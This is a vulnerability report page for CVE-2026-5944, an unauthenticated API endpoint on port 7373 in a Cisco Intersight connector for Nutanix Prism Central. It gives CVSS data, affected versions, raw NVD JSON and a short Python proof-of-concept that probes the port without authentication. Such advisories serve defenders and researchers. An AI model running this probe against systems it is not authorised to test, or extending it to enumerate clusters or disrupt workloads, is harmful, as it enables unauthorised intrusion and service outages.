Security Vulnerability Report
中文
CVE-2026-5944 CVSS 8.2 HIGH

CVE-2026-5944

Published: 2026-04-28 14:16:14
Last Modified: 2026-05-18 19:44:02
Source: 2ffdacf6-8681-47df-b023-4f11abd61c1d

Description

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment environment without authentication. An unauthenticated attacker with network access can exploit this vulnerability by sending crafted requests to the exposed endpoint to enumerate cluster metadata, including virtual machine information and cluster configuration details. While the API primarily supports read-only operations, it also allows certain cluster maintenance workflows to be invoked. Although this vulnerability does not allow persistent modification of system configurations or access to credentials or sensitive user data, successful exploitation may result in disruption of active workloads, leading to loss of service availability within the affected environment.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:cisco:intersight_device_connector:*:*:*:*:*:*:*:* - VULNERABLE
Cisco Intersight Device Connector for Nutanix Prism Central (具体受影响版本请参考Nutanix Security Advisory 0046)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_cve_2026_5944(target_ip): """ PoC for CVE-2026-5944: Unauthenticated access to API passthrough on port 7373. """ target_url = f"http://{target_ip}:7373/" # Default vulnerable port headers = { "User-Agent": "CVE-2026-5944-Scanner", "Accept": "application/json" } try: # Send a request without authentication to enumerate metadata response = requests.get(target_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Target {target_ip} is vulnerable!") print(f"[+] Response received: {response.text[:200]}") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Target {target_ip} requires authentication. Not vulnerable.") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python3 poc.py <target_ip>") else: check_cve_2026_5944(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5944", "sourceIdentifier": "2ffdacf6-8681-47df-b023-4f11abd61c1d", "published": "2026-04-28T14:16:13.853", "lastModified": "2026-05-18T19:44:01.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment environment without authentication.\n\n\n\nAn unauthenticated attacker with network access can exploit this vulnerability by sending crafted requests to the exposed endpoint to enumerate cluster metadata, including virtual machine information and cluster configuration details. While the API primarily supports read-only operations, it also allows certain cluster maintenance workflows to be invoked.\n\n\n\nAlthough this vulnerability does not allow persistent modification of system configurations or access to credentials or sensitive user data, successful exploitation may result in disruption of active workloads, leading to loss of service availability within the affected environment."}], "metrics": {"cvssMetricV40": [{"source": "2ffdacf6-8681-47df-b023-4f11abd61c1d", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:C/RE:L/U:Amber", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NO", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "LOW", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "2ffdacf6-8681-47df-b023-4f11abd61c1d", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}], "cvssMetricV2": [{"source": "2ffdacf6-8681-47df-b023-4f11abd61c1d", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C", "baseScore": 8.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 7.8, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "2ffdacf6-8681-47df-b023-4f11abd61c1d", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cisco:intersight_device_connector:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.3.0", "versionEndIncluding": "7.5.0", "matchCriteriaId": "B8DF903A-BC2C-432E-BC3C-FF339EDF16D6"}]}]}], "references": [{"url": "https://download.nutanix.com/alerts/Security_Advisory_0046.pdf", "source": "2ffdacf6-8681-47df-b023-4f11abd61c1d", "tags": ["Third Party Advisory"]}, {"url": "https://portal.nutanix.com/page/documents/list?type=software&filterKey=software&filterVal=Prism", "source": "2ffdacf6-8681-47df-b023-4f11abd61c1d", "tags": ["Product", "Third Party Advisory"]}, {"url": "https://www.nutanix.com/support", "source": "2ffdacf6-8681-47df-b023-4f11abd61c1d", "tags": ["Product", "Third Party Advisory"]}]}}